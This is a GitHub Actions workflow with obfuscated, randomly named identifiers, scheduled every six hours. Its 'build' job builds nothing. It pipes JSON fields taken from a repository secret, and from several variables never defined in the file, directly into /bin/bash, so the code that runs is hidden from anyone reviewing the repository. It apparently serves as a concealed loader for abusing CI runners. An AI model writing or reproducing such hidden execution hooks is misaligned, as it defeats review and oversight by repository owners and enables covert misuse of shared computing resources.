name: aboardsoil
on:
  workflow_dispatch:
  schedule:
    - cron: '11 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: aboardsoil
        env:
          j8: ${{ secrets.j8 }}
        run: |
          echo $j8 | jq -r .wylel6 | /bin/bash
          echo $nkc7470 | jq -r .jawbt1369 | /bin/bash
          echo $va17967 | jq -r .mu28120 | /bin/bash
          echo $iz022 | jq -r .qiyg69627 | /bin/bash

